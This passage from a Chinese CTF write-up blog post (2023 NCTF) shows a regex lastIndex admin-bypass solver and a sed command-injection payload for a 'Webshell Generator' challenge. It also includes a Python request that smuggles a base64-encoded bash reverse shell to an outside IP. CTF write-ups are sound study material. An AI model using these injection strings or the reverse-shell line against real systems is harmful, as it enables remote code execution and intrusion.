class="string">&quot;admin&quot;</span>&#125;)</span><br><span class="line"><span class="built_in">print</span>(resp.text)</span><br><span class="line"></span><br><span class="line">resp = rs.post(remote_addr+<span class="string">&quot;/api/flag&quot;</span>,json=</span><br><span class="line">&#123;<span class="string">&quot;username&quot;</span>:<span class="string">&quot;admin&quot;</span>,<span class="string">&quot;password&quot;</span>:<span class="string">&quot;admin&quot;</span>&#125;)</span><br><span class="line"><span class="built_in">print</span>(resp.text)</span><br></pre></td></tr></table></figure>

<img src="/2023/12/27/2023-NCTF-WP/flag3.png" class>
<h3 id="调试分析"><a href="#调试分析" class="headerlink" title="调试分析"></a>调试分析</h3><p>虽然理解了特性，不过我个人觉得不调试一下是很不清晰的，所以就又调试了一遍。</p>
<p>先来看第一遍发包的时候，传数组，确实能够看到抛出异常，导致 <code>lastIndex</code> 不会被重置。</p>
<img src="/2023/12/27/2023-NCTF-WP/debug1.png" class>

<p>接着去请求 <code>/api/flag</code>，去修改 <code>lastIndex</code>，第一次的时候，由于 <code>lastIndex</code> 还是 0，匹配 admin 为 true</p>
<img src="/2023/12/27/2023-NCTF-WP/index0.png" class>

<p>当第二次再发起请求的时候</p>
<img src="/2023/12/27/2023-NCTF-WP/index5.png" class>

<p>成功 bypass 了</p>
<h2 id="Webshell-Generator"><a href="#Webshell-Generator" class="headerlink" title="Webshell Generator"></a>Webshell Generator</h2><p>最开始 download.php 是有任意文件读取的，不能直接读 flag，需要执行 <code>/readflag</code>，所以需要 rce 的。核心聚焦于这一个文件上，generate.sh</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">set</span> -e</span><br><span class="line"></span><br><span class="line">NEW_FILENAME=$(<span class="built_in">tr</span> -dc a-z0-9 &lt;/dev/urandom | <span class="built_in">head</span> -c 16)</span><br><span class="line"><span class="built_in">cp</span> template.php <span class="string">&quot;/tmp/<span class="variable">$NEW_FILENAME</span>&quot;</span></span><br><span class="line"><span class="built_in">cd</span> /tmp</span><br><span class="line"></span><br><span class="line">sed -i <span class="string">&quot;s/KEY/<span class="variable">$KEY</span>/g&quot;</span> <span class="string">&quot;<span class="variable">$NEW_FILENAME</span>&quot;</span></span><br><span class="line">sed -i <span class="string">&quot;s/METHOD/<span class="variable">$METHOD</span>/g&quot;</span> <span class="string">&quot;<span class="variable">$NEW_FILENAME</span>&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">realpath</span> <span class="string">&quot;<span class="variable">$NEW_FILENAME</span>&quot;</span></span><br></pre></td></tr></table></figure>

<p>sed -i 命令用于在文件中直接修改文本内容，而不是将输出打印到标准输出。使用该命令可以在不创建临时文件的情况下，直接修改原始文件的内容。</p>
<p>这里的 sed -i 的最终效果是修改 template.php 中的任意一个变量。</p>
<p>来看一下 <code>sed</code> 命令的官方文档</p>
<p><a class="link" target="_blank" rel="noopener" href="https://www.gnu.org/software/sed/manual/">https://www.gnu.org/software/sed/manual/<i class="fas fa-external-link-alt"></i></a></p>
<p>GNU sed 可以通过 e 指令执⾏系统命令。闭合原先的s指令，执⾏ <code>/readflag</code>，会将 flag 插⼊到输出⽂件的第⼀⾏。⾃动跳转到 download.php 读取即可。</p>
<p>由此能够构造出的 payload 是</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/g;1e /readflag;s</span><br></pre></td></tr></table></figure>

<img src="/2023/12/27/2023-NCTF-WP/readflag.png" class>

<p>拿到 flag</p>
<img src="/2023/12/27/2023-NCTF-WP/flag4.png" class>

<p>反弹 shell 也是可以的（但是我复现失败了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">resp = requests.post(<span class="string">&quot;http://117.50.175.234:8001/index.php&quot;</span>,data=</span><br><span class="line">&#123;<span class="string">&quot;language&quot;</span>:<span class="string">&quot;PHP&quot;</span>,<span class="string">&quot;key&quot;</span>:<span class="string">&#x27;&#x27;&#x27;/g; 1e bash -c &quot;&#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjIxLjEzOC8zMzMzIDA+JjE=&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot; #s//&#x27;&#x27;&#x27;</span>,<span class="string">&quot;method&quot;</span>:<span class="string">&quot;1&quot;</span>,<span class="string">&quot;filename&quot;</span>:<span class="string">&quot;2&quot;</span>&#125;)</span><br><span class="line"><span class="built_in">print</span>(resp.status_code,resp.text)</span><br></pre></td></tr></table></figure>

<h2 id="EvilMQ"><a href="#EvilMQ" class="headerlink" title="EvilMQ"></a>EvilMQ</h2><p>有空再复现，最近太忙了。</p>
<p>想结合 QL 来看看，感觉上有可能成为一个新的攻击面。</p>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>总结一下，是很用心的比赛，出题质量很高</p>

            </div>

            
                <div class="post-copyright-info">
                    
<div class="article-copyright-info-container">
    <ul class="copyright-info-content">
        <li class="post-title">
            <span class="type">本文标题</span>：<span class="content">2023 NCTF WP</span>
        </li>
        <li class="post-author">
            <span class="type">本文作者</span>：<span class="content">Drunkbaby</span>
        </li>
        <li class="post-time">
            <span class="type">创建时间</span>：<span class="content">2023-12-27 16:08:39</span>
        </li>
        <li class="post-link">
            <span class="type">本文链接</span>：<span class="content">2023/12/27/2023-NCTF-WP/</span>
        </li>
        <li class="post-license">
            <span class="type">版权声明</span>：<span class="content">本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！</span>
        </li>
    </ul>
    <div class="copy-copyright-info flex-center tooltip" data-content="复制版权信息" data-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/WP/"><i class="icon fas fa-hashtag"></i>WP</a>&nbsp;
                        </li>
                    
                </ul>
            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                               rel="prev"
                               href="/2024/01/05/CVE-2023-46604-Apache-ActiveMQ-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"
                            >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                                <span class="title flex-center">
                                <span class="post-nav-title-item text-ellipsis">CVE-2023-46604 Apache ActiveMQ RCE 漏洞分析</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                               rel="next"
                               href="/2023/12/07/Jackson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%EF%BC%88%E4%B8%89%EF%BC%89CVE-2017-17485/"
                            >
                            <span class="title flex-center">
                                <span class="post-nav-title-item text-ellipsis">Jackson 反序列化（三）CVE-2017-17485</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                                <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                            </a>
                        </div>
                    
                </div>
            

            
                


    <div class="comments-container">
        <div id="comments-anchor"></div>
        <div class="comment-area-title">
            <i class="fas fa-comments"></i>&nbsp;评论
        </div>
        
            .valine-container {

  #vcomments {

    .vwrap {

      border 0.1rem solid var(--text-color-4)

      .vheader {

        .vinput {

          color var(--text-color-3)
          border-color var(--text-color-4)

          &:focus {
            border-bottom 0.1rem dashed var(--primary-color) !important
          }
        }
      }


      .vedit {

        .veditor {
          color var(--text-color-3)
        }

        .vctrl {

          .vicon {

            fill var(--text-color-3)

            &.actived {
              fill var(--primary-color)
            }
          }
        }
      }


      button.vsubmit {
        color var(--text-color-3) !important
        background transparent !important
        border 0.1rem solid var(--text-color-3) !important

        &:hover {
          color var(--primary-color) !important
          border 0.1rem solid var(--primary-color) !important
        }
      }
    }


    .vcount {
      color var(--text-color-3)

      .vnum {
        color var(--text-color-2)
      }
    }


    .vcard {

      .vnick {
        .author {
          margin-left 0.15rem
          padding 0.15rem
          color #fff
          font-weight 450
          font-size 0.9rem
          background -webkit-linear-gradient(45deg, #e3565e, #ee854b, #f6c258, #90c68a, #5fb3b3, #6699cc, #c594c5)
          background linear-gradient(45deg, #e3565e, #ee854b, #f6c258, #90c68a, #5fb3b3, #6699cc, #c594c5)
          border-radius 0.15rem
        }
      }


      .vhead {

        .vnick {
          color var(--primary-color)
        }

        .vsys {
          color var(--text-color-3)
          background var(--background-color-2) !important
        }
      }


      .vcontent {
        P {
          color var(--text-color-3)

          code {
            color var(--code-foreground)
            background var(--code-background)
          }
        }
      }


      .vh {
        border-bottom-color var(--border-color)
      }

      .vquote {
        border-left-color var(--border-color)
      }
    }


    .vcopy {
      color var(--text-color-4)
    }


    .vpage {

      .vmore {
        color var(--text-color-2)
        border 0.1rem solid var(--border-color)
      }
    }
  }
}

        
    </div>





            
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2023-NCTF-WP"><span class="nav-text">2023 NCTF WP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Logging"><span class="nav-text">Logging</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ez-wordpress"><span class="nav-text">ez_wordpress</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#wait-what"><span class="nav-text">wait what</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B0%83%E8%AF%95%E5%88%86%E6%9E%90"><span class="nav-text">调试分析</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Webshell-Generator"><span class="nav-text">Webshell Generator</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#EvilMQ"><span class="nav-text">EvilMQ</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93"><span class="nav-text">小结</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2021</span>&nbsp;-&nbsp;2024
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Drunkbaby</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.7.3</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            

            
                <span class="count-box border-box uv">
                    <span class="item-type border-box">访问人数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-box border-box pv">
                    <span class="item-type border-box">总访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        
            <li class="tools-item flex-center go-to-comments">
                <i class="fas fa-comment"></i>
                <span class="post-comments-count"></span>
            </li>
        
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        
            <li class="tools-item go-to-comments-tablet flex-center">
                <i class="fas fa-comment"></i>
            </li>
        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2023-NCTF-WP"><span class="nav-text">2023 NCTF WP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Logging"><span class="nav-text">Logging</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ez-wordpress"><span class="nav-text">ez_wordpress</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#wait-what"><span class="nav-text">wait what</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B0%83%E8%AF%95%E5%88%86%E6%9E%90"><span class="nav-text">调试分析</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Webshell-Generator"><span class="nav-text">Webshell Generator</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#EvilMQ"><span class="nav-text">EvilMQ</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93"><span class="nav-text">小结</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/code-block.js"></script>




<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/post-helper.js"></script>
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/libs/anime.min.js"></script>
        
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/toc.js"></script>
        
    
    
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>




</body>
</html>
